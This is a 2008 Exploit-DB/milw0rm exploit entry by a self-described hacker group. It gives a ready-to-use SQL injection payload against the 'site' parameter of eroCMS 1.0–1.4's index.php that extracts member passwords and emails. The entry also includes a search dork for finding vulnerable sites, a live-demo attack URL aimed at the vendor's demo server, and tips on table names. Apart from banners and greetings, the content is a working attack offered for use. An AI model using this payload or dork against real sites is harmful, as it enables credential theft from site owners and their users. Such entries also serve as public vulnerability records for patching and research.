eroCMS 1.4 - 'site' SQL Injection

EDB-ID:

5846


Author:

Mr.SQL

Type:

webapps


Platform:

PHP

Date:

2008-06-17


#########################################################################
#################### Viva IslaM Viva IslaM ##############################
##
## Remote SQL Injection Vulnerability
##
## eroCMS V1.0 - V1.1 - V1.2 - V1.3 - V1.4 ( index.php site )
##
#########################################################################
#########################################################################
##
## AuTh0r : Mr.SQL
##
## H0ME   : WwW.PaL-HaCkEr.CoM
##
## Email  : SQL@Hotmail.it
##
## !! SYRIAN HaCkErS  !!
########################
########################
##
## Script  : eroCMS
##
## Vesrion : 1.0 - 1.1 - 1.2 - 1.3 - 1.4
##
## site    : www.erocms.de
##
########################
########################
##
## D0rk : "by eroCMS"
##
##
##     -(:: SQL ::)-
##
##    www.site.com/
##          index.php?site=-1'+union+select+1,2,concat_ws(0x3a,passwort,email),4,5+from+members+limit+1,1/*
##
##  -(:: L!VE DEMO ::)-
##
##    http://demo.erocms.de/index.php?site=-1'+union+select+1,2,concat_ws(0x3a,passwort,email),4,5+from+members+limit+1,1/*
##
#######################
#######################
 -(:: NOTE ::)-
maybe table users  ( members )
columns  ( , passwort , email , ) get the user column , USE group by :) , (( This porno script ))
 
#######################################################################################################
#######################################################################################################
 
                                  -(:: !Gr3E3E3E3E3E3E3TzZ! ::)-
 
 :: HaCkEr-EGy :: His0k4 :: Dark MaSTer :: MoHaMeD el 3rab :: ALwHeD :: HeBarieH :: MusliMs HaCkErs ::
#######################################################################################################
#######################################################################################################

# milw0rm.com [2008-06-17]